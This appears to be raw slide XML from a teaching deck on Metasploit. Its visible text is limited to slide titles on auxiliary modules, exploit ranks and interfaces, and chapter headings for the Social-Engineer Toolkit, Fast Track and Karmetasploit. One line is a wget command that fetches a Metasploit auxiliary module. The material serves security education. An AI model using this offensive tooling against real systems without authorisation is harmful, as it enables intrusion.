              <a:t>Wget http://carnal0wnage.googlecode.com/svn/trunk/msf3/modules/auxiliary/admin/random/foursquare.rb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ar-EG" sz="1300" b="1"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48211D90-941A-5A63-1C8A-6F6B33721E50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="135862" y="247786"/>
            <a:ext cx="4285147" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Anatomy of an Auxiliary Module</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C25EE62B-7D17-EE06-83B3-AB824A38E2D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1272746" y="856539"/>
            <a:ext cx="10206681" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>reat deal of programming to the Framework, allowing us to focus on the specifics of a module.</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Arrow: Right 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B02E24-DCF0-B856-3982-D1A3C690F2C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10733560" y="1857563"/>
            <a:ext cx="1367604" cy="435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TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E33D1171-7FE2-1781-118C-7FC5D9A68BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11065691" y="1952433"/>
            <a:ext cx="827471" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>Unreal Link</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2125950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472152"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Exploits Ranks </a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC5AA2C-B764-DC49-0DF8-A0EABDD8114F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766887" y="1285875"/>
            <a:ext cx="8658225" cy="42862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77743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53059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B3047DF-C9E6-2348-EFF9-B0BF169A64E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7305869" y="3021581"/>
            <a:ext cx="4635800" cy="3836419"/>
            <a:chOff x="507" y="1182"/>
            <a:chExt cx="3091" cy="2558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92F61E4D-3C63-2874-8AD0-CCDC7F4F24B5}"/>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6" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1AA97DF-78DE-9A95-25FC-FA090FBC4841}"/>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7" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DFC341-ED33-142F-6B17-0D7996FA129A}"/>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FD270549-8802-20C6-EDAE-72970743752B}"/>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8DE45F4A-C2F4-2112-06A3-80680028BF4D}"/>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B9DC72A3-6033-FD38-6115-3B2CB024D0A7}"/>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430258FC-4F0D-343F-EDCD-536DC8340321}"/>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9BF50BA3-2C5C-EF51-FD35-E19A22AB330F}"/>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13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82992DF2-DEE6-4E9A-AE3B-3D0B333F78A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7550332" y="3251047"/>
            <a:ext cx="4077134" cy="2327648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{109D2606-6F9C-ED2C-5778-84B13C0A5E99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="18356948">
            <a:off x="5399111" y="6092743"/>
            <a:ext cx="1781824" cy="717637"/>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1218621">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2398">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54EFFBB8-146F-AC01-F231-04BF30813565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="97582" y="3018583"/>
            <a:ext cx="4635800" cy="3836419"/>
            <a:chOff x="507" y="1182"/>
            <a:chExt cx="3091" cy="2558"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F0CEAFA-40E9-E169-D89C-D70F981A4DC3}"/>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7" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A57BABD8-6900-2C22-4793-C20B1BABDA7B}"/>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8" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{574CDF1A-ABC8-1A72-5FD4-CF80F77EAC9C}"/>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9" name="Freeform 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DBC5611-B4E6-DFB7-9199-1F943462298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0" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5243BA3-334B-162F-1CB0-A61AD08ACC01}"/>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21" name="Freeform 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5C753C2-2A97-5AA9-9991-984F3C7B0773}"/>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1C7CCE9-3B93-DF14-B6AA-955391FE4E18}"/>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66FD90CC-8AB7-D6C8-C787-6061BC0C6C27}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B13B456-E51F-9AD6-EFEE-9569903793D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="275108" y="3213863"/>
            <a:ext cx="4270248" cy="2402015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Freeform 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1718F2E0-2A42-5D84-6A3A-FFFF08C768A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2772847">
            <a:off x="-554635" y="1663313"/>
            <a:ext cx="1793360" cy="722283"/>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1218621">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2398">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E977AD6C-E817-98EA-DAC1-5DCB71252266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202644" y="93093"/>
            <a:ext cx="6295644" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>MSF INTERFACES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59508ECA-72A1-A8F5-AD8B-3121CC88B720}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-226212" y="1524981"/>
            <a:ext cx="5074920" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>GUI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Graphical User Interface </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B29BD1B-42A7-A56B-661B-F11467166784}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290023" y="1835464"/>
            <a:ext cx="6295644" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Console </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3327480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3631061" y="0"/>
            <a:ext cx="4929876" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T H E  S O C I A L E N G I N E E R</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T O O L K I T</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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401C02A4-A014-610E-AF8D-13AD69A303BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247136" y="1015663"/>
            <a:ext cx="7317131" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Social-Engineer Toolkit (SET)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	 was developed to coincide with the release of Social-Engineer.org</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E2B56ED-7FFB-2393-45B9-F090332FE2AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="247136" y="1941069"/>
            <a:ext cx="4616970" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Configuring the Social-Engineer Toolkit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B3F94A6-DB8E-8F5C-528C-F94C5253F41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671295" y="2509107"/>
            <a:ext cx="1563248" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>svn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> update</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2293799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658741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2793223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781113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4751978" y="-2118"/>
            <a:ext cx="2688044" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>F A S T  T R A C K</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="24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502371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191657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579514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892249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4254342" y="-2119"/>
            <a:ext cx="3683316" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Chapter 12</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>K A R M E T A S P L O I T</a:t>
            </a:r>
            <a:endParaRPr lang="ar-EG" sz="24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351263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822010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6" descr="SmartArt Process diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A82C7691-A71A-6FFD-1D07-9254B67804BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="556329792"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="71872" y="1576873"/>
          <a:ext cx="12120128" cy="6273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503B3323-B7CC-C46E-A002-D6FAE22F7C3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="153490" y="75300"/>
            <a:ext cx="1807958" cy="941082"/>
            <a:chOff x="3402" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Arrow: Pentagon 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{374CE40D-0CEA-3CDF-3CAA-CEDB5B22BF07}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
